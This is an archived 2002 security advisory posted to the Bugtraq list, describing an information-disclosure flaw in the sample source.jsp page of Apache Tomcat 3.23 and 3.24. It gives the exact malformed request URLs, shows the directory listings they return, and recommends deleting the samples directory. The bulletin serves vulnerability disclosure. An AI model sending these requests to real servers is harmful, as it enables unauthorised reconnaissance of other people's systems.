Vulnerability in Apache Tomcat v3.23 & v3.24
From: webmaster@procheckup.comDate: 05/29/02
- Previous message: FreeBSD Security Advisories: "FreeBSD Security Advisory FreeBSD-SA-02:26.accept"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Date: 29 May 2002 13:31:27 -0000 From: <webmaster@procheckup.com> To: bugtraq@securityfocus.com('binary' encoding is not supported, stored as-is)
Procheckup Ltd
www.procheckup.com
Procheckup Security Bulletin PR02-05
Description: Tomcat source.jsp directory listing and
webroot location display
Date: 8/1/2002
Application: Apache Tomcat Java server versions 3.23 and
3.24
Platform: Linux/Unix
Severity: Remote attackers can obtain listings of web
directories and sometines the location of webroot
Authors: Richard Brain [richard.brain@procheckup.com]
Vendor Status:
CVE Candidate: Not assigned
Reference: www.procheckup.com/security_info/vuln.html
Description:
Tomcat is the free opensource Java server,
http://jakarta.apache.org/tomcat/.
Normally source.jsp is used to look at the source code of
programs within the examples directories. A typical
request is
http://webserver:80/examples/jsp/source.jsp?/jsp/num/numgues
s.jsp.
We have found by using source.jsp with a malformed input a
directory listing is displayed and the location of the
webroot is sometimes disclosed.
The vulnerabilities may only work on port 8080 rather than
port 80, dependant on how the webserver has been configured
with Tomcat.
Exploits
A) Requesting the following url :-
http://webserver:80/examples/jsp/source.jsp??
Gives the directory listing and webroot on 3.23, 3.24 just
gives a directory listing.
<title>Directory Listing</title>
<base
href="file://localhost/"WEBROOT"/webapps/examples/"><h1>/"WE
BROOT"/webapps/examples</h1>
<hr>
<img align=middle src="doc:/lib/images/ftp/directory.gif"
width=32 height=32>
<a href="images">images</a><br><img align=middle
src="doc:/lib/images/ftp/directory.gif" width=32 height=32>
<a href="jsp">jsp</a><br><img align=middle
src="doc:/lib/images/ftp/directory.gif" width=32 height=32>
<a href="META-INF">META-INF</a><br><img align=middle
src="doc:/lib/images/ftp/directory.gif" width=32 height=32>
<a href="servlets">servlets</a><br><img align=middle
src="doc:/lib/images/ftp/directory.gif" width=32 height=32>
<a href="WEB-INF">WEB-INF</a><br>
B) Requesting the following url :-
http://webserver:80/examples/jsp/source.jsp?/jsp/
Gives the directory listing and webroot on 3.23, 3.24 just
gives a directory listing on a subdirectory.
<title>Directory Listing</title>
<base
href="file://localhost/"WEBROOT"/webapps/examples/jsp/"><h1>
/"WEBROOT"/webapps/examples/jsp</h1>
<hr>
<img align=middle src="doc:/lib/images/ftp/directory.gif"
width=32 height=32>
<a href="cal">cal</a><br><img align=middle
src="doc:/lib/images/ftp/directory.gif" width=32 height=32>
<a href="checkbox">checkbox</a><br><img align=middle
src="doc:/lib/images/ftp/directory.gif" width=32 height=32>
<a href="colors">colors</a><br><img align=middle
src="doc:/lib/images/ftp/directory.gif" width=32 height=32>
<a href="dates">dates</a><br><img align=middle
src="doc:/lib/images/ftp/directory.gif" width=32 height=32>
<a href="error">error</a><br><img align=middle
src="doc:/lib/images/ftp/directory.gif" width=32 height=32>
<a href="forward">forward</a><br><img align=middle
src="doc:/lib/images/ftp/directory.gif" width=32 height=32>
<a href="include">include</a><br><img align=middle
src="doc:/lib/images/ftp/file.gif" width=32 height=32>
<a href="index.html">index.html</a><br><img align=middle
src="doc:/lib/images/ftp/directory.gif" width=32 height=32>
<a href="jsptoserv">jsptoserv</a><br><img align=middle
src="doc:/lib/images/ftp/directory.gif" width=32 height=32>
<a href="num">num</a><br><img align=middle
src="doc:/lib/images/ftp/directory.gif" width=32 height=32>
<a href="plugin">plugin</a><br><img align=middle
src="doc:/lib/images/ftp/directory.gif" width=32 height=32>
<a href="security">security</a><br><img align=middle
src="doc:/lib/images/ftp/directory.gif" width=32 height=32>
<a href="sessions">sessions</a><br><img align=middle
src="doc:/lib/images/ftp/directory.gif" width=32 height=32>
<a href="simpletag">simpletag</a><br><img align=middle
src="doc:/lib/images/ftp/directory.gif" width=32 height=32>
<a href="snp">snp</a><br><img align=middle
src="doc:/lib/images/ftp/file.gif" width=32 height=32>
<a href="source.jsp">source.jsp</a><br>
Solution:
Delete the samples directory if not needed.
Legal:
Copyright 2002 Procheckup Ltd. All rights reserved.
Permission is granted for copying and circulating this
Bulletin
to the Internet community for the purpose of alerting
them to problems
, if and only if, the Bulletin is not edited or changed
in any way,
is attributed to Procheckup, and provided such
reproduction and/or
distribution is performed for non-commercial purposes.
Any other use of this information is prohibited.
Procheckup is not
liable for any misuse of this information by any third
party.
- Previous message: FreeBSD Security Advisories: "FreeBSD Security Advisory FreeBSD-SA-02:26.accept"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|
